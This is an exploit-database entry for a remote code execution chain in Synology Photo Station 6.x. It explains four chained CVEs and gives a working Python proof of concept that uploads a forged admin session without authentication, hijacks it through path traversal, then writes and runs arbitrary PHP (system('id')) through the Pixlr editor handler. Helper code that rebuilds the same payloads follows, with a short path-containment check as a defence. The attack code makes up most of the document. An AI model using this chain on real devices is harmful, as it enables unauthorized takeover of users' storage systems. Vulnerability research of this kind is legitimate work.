Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution

ID SSV:96600
Type seebug
Reporter Root
Modified 2017-09-29T00:00:00


Description: The remote code execution chains four different vulnerabilities; a fifth, CVE-2017-11155, is only used to tell whether a target is vulnerable:

CVE-2017-11151 allows remote attackers to upload arbitrary files to the specified directories.

CVE-2017-11152 allows remote attackers to log in with a fake authentication mechanism (a forged session file).

CVE-2017-11153 allows remote attackers to log in to Photo Station with any identity.

CVE-2017-11154 allows remote authenticated attackers with administrator privileges in Photo Station to execute arbitrary code on the vulnerable NAS.

CVE-2017-11155 allows remote attackers to identify whether Photo Station is vulnerable or not.

The chain of vulnerabilities will allow you, in the end, to execute code as the following user:

uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)

import base64
import requests

# Base URL of the target NAS (scheme and host), e.g. 'http://nas.example'
synology_ip = ''
# Your own IP address as the NAS sees it: Photo Station compares it with the
# security_identifier stored in the session, so the forged session must carry it
ip = ''
# PHP code you want to execute
php_to_execute = '<?php echo system("id"); ?>'

# CVE-2017-11152: a PHP session file is just "<name>|<serialized value>", so an
# admin session can be written by hand (PHP strings are prefixed with their length)
encoded_session = 'root|a:2:{s:19:"security_identifier";s:' + str(len(ip)) + ':"' + ip + '";s:15:"admin_syno_user";s:7:"hlinak3";}'

print("[+] Set fake admin session")
# CVE-2017-11151: the logo upload stores our "image" on disk without authentication
files = [('file', ('foo.jpg', encoded_session))]
r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data={'action': 'logo_upload'}, files=files)
print(r.text)

print("[+] Login as fake admin")
# CVE-2017-11153: the session parameter is used as a file name, so a traversal
# path makes PHP load the uploaded logo as our session.
# Depending on the version the logo is stored in a different directory.
payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}
try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)
whichact = {'action': 'get_setting'}
r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
print(r.text)

print("[+] Upload php file")
# CVE-2017-11154: the admin-only Pixlr handler writes 'image' to the base64-encoded
# 'path'; a data:// wrapper lets us supply arbitrary PHP as the image contents
c = {
    'action': 'save',
    'image': 'data://text/plain;base64,' + base64.b64encode(php_to_execute.encode()).decode(),
    'path': base64.b64encode(b'/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit').decode(),
    'type': 'php',
}
r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
print(r.text)

print("[+] Execute payload")
f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))
print(f.text)
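The PoC above hard-codes the PHP string lengths of the forged session and base64-encodes the Pixlr fields by hand. As an added example (not part of the original write-up and not Synology's code), the Python below builds those two payloads generically, decodes the Pixlr fields back to show exactly what the server would write, and adds an illustrative path-containment check of the kind that stops the session traversal in step two. The session directory /tmp/photo_sessions and all function names are hypothetical; the sample inputs are constructed from the values used on this page.

```python
import base64
import posixpath


def php_serialize(value):
    """Serialize a Python str/int/bool/dict the way PHP's serialize() does."""
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # PHP prefixes strings with their byte length, not their character count
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type: %r" % type(value))


def forge_session(client_ip, username, varname="root"):
    """Body of the session file the PoC uploads: '<var>|<serialized array>'.

    Photo Station ties the session to the client's IP (security_identifier),
    so client_ip must be the address the NAS sees the attacker connect from.
    """
    session = {"security_identifier": client_ip, "admin_syno_user": username}
    return "%s|%s" % (varname, php_serialize(session))


def pixlr_save_fields(php_code, target_path):
    """Form fields for the PixlrEditorHandler 'save' action as the PoC sends them:
    the PHP source rides inside a data:// wrapper, the destination path is base64."""
    return {
        "action": "save",
        "image": "data://text/plain;base64," + base64.b64encode(php_code.encode()).decode(),
        "path": base64.b64encode(target_path.encode()).decode(),
        "type": "php",
    }


def decode_pixlr_fields(fields):
    """Undo the encoding the server performs: return (php_source, target_path)."""
    prefix = "data://text/plain;base64,"
    if not fields["image"].startswith(prefix):
        raise ValueError("not a base64 data:// URI")
    php_source = base64.b64decode(fields["image"][len(prefix):]).decode()
    target_path = base64.b64decode(fields["path"]).decode()
    return php_source, target_path


def session_param_is_confined(session_param, session_dir="/tmp/photo_sessions"):
    """Illustrative server-side check (hypothetical, not Synology's code): accept the
    session parameter only if, after concatenation and normalisation, it still
    resolves inside session_dir.  session_dir stands in for wherever the
    application keeps its session files."""
    resolved = posixpath.normpath(session_dir + "/" + session_param)
    return resolved.startswith(session_dir.rstrip("/") + "/")


if __name__ == "__main__":
    # Constructed sample values matching the PoC on this page
    print(forge_session("10.0.0.5", "hlinak3"))
    fields = pixlr_save_fields('<?php echo system("id"); ?>',
                               "/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit")
    print(fields)
    print(decode_pixlr_fields(fields))
    print(session_param_is_confined("sess_abc123"))
    print(session_param_is_confined(
        "/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png"))
```

The containment check normalises the concatenated path the same way the filesystem would before deciding, which is why a parameter starting with `/../` is rejected even though each `..` component on its own looks harmless.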